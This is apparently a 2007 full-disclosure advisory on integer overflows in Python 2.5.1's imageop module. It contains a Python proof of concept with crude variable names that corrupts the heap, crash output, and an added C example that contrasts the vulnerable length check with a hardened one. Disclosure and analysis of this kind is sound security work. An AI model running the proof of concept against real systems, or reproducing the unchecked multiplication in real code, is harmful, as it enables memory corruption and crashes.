[Full-disclosure] python <= 2.5.1 standard library: multiple integer overflows, heap overflow in imageop module

2007-09-19T00:00:00
ID SECURITYVULNS:DOC:18028
Type securityvulns
Reporter Securityvulns
Modified 2007-09-19T00:00:00

Description

The imageop module contains many integer overflows, which lead to heap overflows and possibly to memory disclosure. The files imageop.c and rgbimgmodule.c are examples.

static PyObject *
imageop_tovideo(PyObject *self, PyObject *args)
{
    int maxx, maxy, x, y, len;

    ........................

    /* ***************************************************************
       integer overflow here: maxx*maxy*width wraps around, which
       makes it possible to bypass the len check
       *************************************************************** */

    if ( maxx*maxy*width != len ) {
        PyErr_SetString(ImageopError, "String has incorrect length");
        return 0;
    }

    rv = PyString_FromStringAndSize(NULL, len);
    if ( rv == 0 )
        return 0;
    ncp = (unsigned char *)PyString_AsString(rv);

    if ( width == 1 ) {
        memcpy(ncp, cp, maxx);        /* Copy first line */
        ncp += maxx;

        /* with a negative maxy the loop below is never entered,
           so the remaining code is bypassed */

        for (y=1; y<maxy; y++) {    /* Interpolate other lines */

An IA-32 (32-bit) proof of concept:


import imageop

sexshit = "a"*1603          # 1603-byte input string: len == 1603
evil = "p"*5241
connard = "s"*2000
supaire = "45"*65
print supaire
connard = "cool"
salope = "suceuse"
# width=1, maxx=4461, maxy=-2147002257: 4461 * -2147002257 * 1 wraps to 1603
# in 32-bit arithmetic, so the length check passes; memcpy then copies
# maxx=4461 bytes out of (and into) a 1603-byte buffer
dtc = imageop.tovideo(sexshit,1,4461,-2147002257)
sexshit = "dtc"*52
print connard,supaire," fin de dump"


www@AtlanticDrive:~$ python sux.py
4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545
cool 4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545  fin de dump
*** glibc detected *** corrupted double-linked list: 0x0817d3f0 ***
Aborted
www@AtlanticDrive:~$
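The length-check bypass described above, as an added example that is not part of the original post or of CPython: the first function evaluates the original `maxx*maxy*width != len` test with the 32-bit wraparound the proof of concept relies on, the second is a hardened version of the same check that rejects non-positive dimensions and tests every multiplication for overflow before performing it, and the third computes how far the `memcpy(ncp, cp, maxx)` on the `width == 1` path would run past the destination buffer. The parameters come from the proof of concept (len 1603, width 1, maxx 4461, maxy -2147002257); the function names are assumptions for illustration.

```c
/*
 * Added example (not from the advisory or from CPython). Reproduces the
 * imageop_tovideo length check with 32-bit wraparound, beside a hardened
 * version of the same check.
 */
#include <stdio.h>
#include <limits.h>
#include <stdint.h>

/* The original check, `maxx*maxy*width != len`, as a 32-bit build behaves in
 * practice. Signed overflow is undefined in C, so the wraparound is reproduced
 * with uint32_t arithmetic, which is defined. Returns 1 if the input would be
 * accepted by the vulnerable code. */
int vulnerable_len_check(int len, int width, int maxx, int maxy)
{
    uint32_t prod = (uint32_t)maxx * (uint32_t)maxy * (uint32_t)width;
    return prod == (uint32_t)len;
}

/* Hardened check: every dimension must be positive and each product is
 * tested against INT_MAX before it is computed, so it can never wrap. */
int safe_len_check(int len, int width, int maxx, int maxy)
{
    if (len < 0 || width <= 0 || maxx <= 0 || maxy <= 0)
        return 0;
    if (maxx > INT_MAX / maxy)          /* maxx*maxy would overflow */
        return 0;
    int area = maxx * maxy;
    if (area > INT_MAX / width)         /* area*width would overflow */
        return 0;
    return area * width == len;
}

/* On the width == 1 path the code copies maxx bytes from a len-byte string
 * into a len-byte buffer. Returns the number of bytes memcpy would write past
 * the end of the destination if the vulnerable check accepts the input, and
 * 0 when the input is rejected or the copy stays in bounds. */
int tovideo_overrun_bytes(int len, int width, int maxx, int maxy)
{
    if (width != 1 || !vulnerable_len_check(len, width, maxx, maxy))
        return 0;
    return maxx > len ? maxx - len : 0;
}

int main(void)
{
    /* Values taken from the advisory's proof of concept. */
    int len = 1603, width = 1, maxx = 4461, maxy = -2147002257;

    printf("vulnerable check accepts:    %d\n",
           vulnerable_len_check(len, width, maxx, maxy));
    printf("hardened check accepts:      %d\n",
           safe_len_check(len, width, maxx, maxy));
    printf("memcpy overrun if accepted:  %d bytes\n",
           tovideo_overrun_bytes(len, width, maxx, maxy));
    return 0;
}
```

With the proof-of-concept values the vulnerable check accepts the input because 4461 * -2147002257 wraps to exactly 1603 modulo 2^32, after which memcpy copies 4461 bytes into a 1603-byte allocation (2858 bytes of heap overwrite, plus an over-read of the source string). The hardened check rejects the same input on the negative maxy alone, and would also catch a positive pair whose product overflows.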

OK, I hate Python's syntax, it's too old school!